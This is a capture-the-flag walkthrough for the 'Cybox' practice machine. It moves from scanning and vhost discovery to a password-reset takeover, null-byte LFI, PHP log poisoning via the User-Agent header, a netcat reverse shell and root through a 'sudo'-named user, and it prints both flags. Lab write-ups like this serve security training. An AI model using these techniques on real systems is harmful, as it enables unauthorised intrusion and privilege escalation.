Will you be able to compromise the internal server of the CYBOX company?
Objective: Get user.txt and root.txt
This works better with VirtualBox rather than VMware.
Let's scan our network to find the IP of the box.
$ sudo netdiscover Currently scanning: 192.168.30.0/16 | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 264 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.40 08:00:27:e2:7c:c9 1 60 PCS Systemtechnik GmbH ...
Ports scan :
$ nmap -p -1024 -T4 -oN scan.nmap 192.168.1.40 PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 80/tcp open http 110/tcp open pop3 143/tcp open imap 443/tcp open https
There are many open ports, ftp, mail (SMTP & POP3), web (HTTP & HTTPS).
I try to do an anonymous login on the FTP but it doesn't work.
Nothing interesting on this static webpage apart from the admin email that give us a valid username and the domain (cybox.company).
The HTTPS certificate confirms the validity of the admin email address.
/C=US/ST=New York/L=New York City/O=Cybox Company/OU=Cybox/CN=cybox.company/emailAddressemail@example.com
gobuster was running in the background to find some new endpoints.
$ /opt/gobuster dir -w /opt/directory-list-lowercase-2.3-medium.txt -x php,txt,html -t 30 --url 192.168.1.40 -q -o gobuster.dir /index.html (Status: 200) [Size: 8514] /assets (Status: 301) [Size: 237] [--> https://cybox.company/assets/] /phpmyadmin (Status: 403) [Size: 92]
The /phpmyadmin returns :
I try to change my Host HTTP header but it does not work.
$ curl -H "Host: localhost" http://192.168.1.40/phpmyadmin For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname $ curl -H "Host: 127.0.0.1" http://192.168.1.40/phpmyadmin For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname
So, I try to bruteforce the VHOST, maybe we can find some new web applications.
$ /opt/gobuster vhost -w /opt/directory-list-lowercase-2.3-medium.txt -t 30 --url http://cybox.company -q -o vhost.dir Found: register.cybox.company (Status: 200) [Size: 1252] Found: dev.cybox.company (Status: 200) [Size: 209] Found: webmail.cybox.company (Status: 302) [Size: 0] Found: monitor.cybox.company (Status: 302) [Size: 0] Found: ftp.cybox.company (Status: 200) [Size: 5295]
Add it to the /etc/hosts file.
$ cat /etc/hosts 192.168.1.40 cybox.company register.cybox.company dev.cybox.company webmail.cybox.company monitor.cybox.company ftp.cybox.company
Yes, there are many apps ! Let's create a user on the register app.
Now, we can log in into the webmail and the monitor app. We have no mail and the monitor has no content. Let's try to reset our password.
Let's check our emails.
Ok now, what if we change the reset link.
Yes ! We can reset the admin password on the monitor app ! We now have access to a new admin panel.
After looking at the source code of the page, we can find this :
<link href="styles.php?style=general" type="text/css" rel="stylesheet">
Maybe we can do a LFI (Local File Inclusion) on the style parameter. After some URL guessing we can find a css file at /admin/styles/general.css.
After some quick try, we can confirm the LFI.
http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../etc/passwd%00 root:x:0:0::/root:/bin/bash ...
So know let's try to load logs file, after some bruteforcing we can find the apache access log from the ftp.cybox.company app at /opt/bitnami/apache2/logs/access_log.
By making HTTP request to the FTP app we can control the content of the access_log file, so we can inject PHP code in it.
$ curl "http://ftp.cybox.company/index.php" -A "<?php echo "toto"; ?>"
-A : User-Agent
Go to http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../opt/bitnami/apache2/logs/access_log%00 ... 192.168.1.30 - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "toto"
The PHP code is executed ! After trying to make a reverse shell, the cybox machine can't reach our box, some firewall rules I guess. So, I create a reverse shell on port 80 and it works !
$ nc -lvnp 80 Connection from 192.168.1.32:41542 /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" python: /opt/bitnami/common/lib/libz.so.1: no version information available (required by python) daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ id uid=1(daemon) gid=1(daemon) groups=1(daemon)
We have our first shell ! Let's find the user.txt flag !
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd bash: cd: HOME not set daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd /home daemon@cybox:/home$ ls admin cybox toto daemon@cybox:/home$ cd cybox daemon@cybox:/home/cybox$ ls user.txt daemon@cybox:/home/cybox$ cat user.txt d85da08f1a31ef96fb6d4f608611bca2
We can change our user to toto:toto that we have previously created on the register app (it's not required to root the box).
After some enumeration we can find a weird SUID binary at /opt/registerlauncher. It's an ELF that create the differents user on the box from the register app (like our user toto). It takes one parameter, the name of the user to create.
I try to find some vulnerabilities associate to the ELF but no result.
So, I ask a question to myself, what user can we create to gain privileges ? Remember from the beginning, I create a user toto and his password was toto too. So, I try to run the script with root as parameter, maybe this will replace the root password to root. But I get "user already exists". RIP
After some research, my friend W00dy find that, if you create a user named sudo we can execute all the commands with sudo by providing the password sudo.
toto@cybox:/tmp$ /opt/registerlauncher sudo firstname.lastname@example.org has been created successfully. The credentials are sudo:sudo. You should change your default password for security. toto@cybox:/tmp$ su sudo Password: sudo To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. sudo@cybox:/tmp$ sudo -l [sudo] password for sudo: sudo Matching Defaults entries for sudo on cybox: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User sudo may run the following commands on cybox: (ALL : ALL) ALL sudo@cybox:/tmp$ sudo su root@cybox:/tmp# id uid=0(root) gid=0(root) groups=0(root)
We are root !
root@cybox:/tmp# cat /etc/sudoers ... # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL ... root@cybox:/tmp# cat /root/root.txt 4c0183fdd736e2b8fb3f57ddbfa8ce36
The user sudo was in the /etc/sudoers file.
Root flag !